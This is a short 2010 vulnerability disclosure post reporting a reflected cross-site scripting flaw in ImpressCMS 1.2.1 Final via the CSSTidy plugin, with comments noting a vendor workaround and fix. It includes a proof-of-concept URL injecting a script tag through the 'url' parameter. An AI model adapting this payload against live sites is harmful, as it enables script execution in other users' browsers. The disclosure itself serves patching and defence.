This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

4 comments:

  1. please be aware, this is not an issue with impresscms, it is an issue with csstidy which is used by many projects.

    ReplyDelete
  2. A workaround has been published by the ImpressCMS project: http://community.impresscms.org/modules/smartsection/item.php?itemid=494

    A security release will be upcoming.

    ReplyDelete
  3. An updated release removing the vulnerability in CSSTidy has been published by ImpressCMS - http://community.impresscms.org/modules/smartsection/item.php?itemid=495

    ReplyDelete